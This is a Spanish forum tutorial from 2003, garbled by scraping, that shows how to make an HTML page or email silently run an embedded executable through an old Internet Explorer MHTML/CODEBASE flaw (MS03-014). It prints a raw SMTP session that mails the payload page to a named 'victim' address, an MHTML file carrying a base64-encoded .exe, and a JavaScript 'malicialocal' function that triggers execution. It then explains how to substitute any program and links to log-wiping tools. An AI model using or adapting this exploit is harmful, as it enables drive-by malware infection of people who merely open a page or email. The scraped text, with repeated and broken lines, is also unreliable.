Documentos de Académico
Documentos de Profesional
Documentos de Cultura
COMO Ejecutando EXE Desde HTML PDF
COMO Ejecutando EXE Desde HTML PDF
echo localhost
mail from: origen@queATACO.com
rcpt to: destino@pobreMiguelito.com
data
Subject: Probando, probando, 1-2, 1-2
Mime-Version: 1.0
Content-Type: text/html;
<HEAD></HEAD>
<BODY BGCOLOR="black" TEXT="yellow" SCROLL=yes>
<img src="img/thor.jpg">
<b>HOLA CHIC@S ESTAIS PREPARADOS...</b>
<br><br>
<iframe src=http://www.terra.es height=300 width=600
scrolling=yes> </iframe>
<iframe src=file://172.28.130.254/kekosas/nul.gif height=1
width=1 scrolling=no> </iframe>
</BODY>
.
quit
MIME-Version: 1.0
Content-Location:file:///vic_thor.exe
Content-Transfer-Encoding: base64
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVG
.........................
.........................
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
<title>Vic_Thor</title>
<body bgcolor=black scroll=no>
<SCRIPT>
function malicialocal()
{
var s=document.URL
var path=unescape(s.substr(-0,s.lastIndexOf("\\")));
var formato= '<body scroll=no bgcolor="black"><FONT face="Arial"
color=orange>';
var imagen= '<img src="img/thor.jpg">';
var texto = '<b> PREPARADOS? Os presento el mejor buscador que
EXISTE!!!</b><br>';
var iframe1='<iframe src=http://www.google.com height=300
width=750></iframe>';
var iframe2='<iframe src=file://172.28.130.254/kekosas/nul.gif
height=1 width=1></iframe>';
var objetoini='<object classid="clsid:66666666-6666-6666-6666"
CODEBASE="mhtml:';
var objetofin='\\Vlocal.html!file:///vic_thor.exe"></object>';
var bugg = objetoini+path+objetofin
document.write (formato+imagen+texto+iframe1+iframe2+bugg);
}
setTimeout("malicialocal()",200);
</script>
Descargado
Descargado
dede
www.DragonJAR.us
www.DragonJAR.us / Google
/ .com=>/"La
"La
WeB
WeB
de DragoN"
de DragoN"
cargue el script del todo, por eso 200 milisegundos, valores a partir de
ese nmero funcionarn tambin sin problemas.
Todos los nombres son ficticios, no tienen porqu ser esos, al igual que
los directorios, lo nico que no debis hacer es cambiar de nombre al
archivo vlocal.html porque sino no os funcionar, bueno s lo har si
adems del nombre fsico del archivo se lo cambiis al contenido de la
variable, cuando empecis a trastear con ello lo entenderis mejor.
Cmo podemos manipular el script para que funcione con otros
ficheros y/o pginas:
1) Se debe convertir el .exe que deseamos ejecutar a Base64 y pegar
su contenido en lugar del que hay.
2) podemos mantener como nombre vic_thor.exe, si quisiramos
cambiarlo, por ejemplo a prog.exe, debemos cambiar stas lneas:
Cdigo:
Content-Location:file:///vic_thor.exe
por:
Content-Location:file:///prog.exe
sta otra
var objetofin='\\Vlocal.html!file:///prog.exe"></object>';
http://www.iespana.es/FTPVicThor/malaweb/manualNC.zip
Cdigos ejecutables (.exe)
Del zapper que borra logs, vercookies, tirar a windows , el decoder para
convertir .exe a Base64 y el escaneador de REDCODE
http://www.iespana.es/FTPVicThor/malaweb/ArchivosEXE.zip
Bueno hay ms formas, existe otras ejecuciones CODEBASE, el bug del
wav-exe, y muchas otras que permiten inyectar archivos .exe en
archivos .html que se ejecutan al visualizarlos, recibirlos por correo o
simplemente por situar el cursor sobre ellos.
Que aproveche y SALUD a todos.
PD. No s si lo veris interesante, pero pienso que la prxima debera
ser el aprender cmo defendernos de todo esto, configurar bien el
equipo, detectar mails maliciosos, evitar la ejecucin de cdigo, etc.
Qu os parece?
--- AMPLIADO HOY JUEVES 22 DE MAYO DE 2003 ---Antes de que ocurriese la prdida inesperada de ste y otros post en el
da de ayer, creo recordar que alguno de vosotros no le funcionaba del
todo.
Microsoft sac un parche (que no he probado) para evitar ste asunto el
23 de abril de 2003, antes de esa fecha ste cdigo ya circulaba entre
alguno de nosotros y funcionaba OK segn los privados que me
enviaron, los que hayis actualizado los hotfix recientemente es
probable que no os funcionen, el caso es que con hotfix o sin ellos
PROBADLO EN LOCAL, para colgarlo de un webserver hay que tocar
algunas cosas, en el ejemplo de VicForWeb est el cdigo modificado
para la web, pero no siempre funcionar, depender mucho del Website
y de la configuracin del navegador del "visitante"
parche:
http://www.microsoft.com/technet/treeview/?url=/technet/security/bull
etin/MS03-014.asp
_________________
-<|: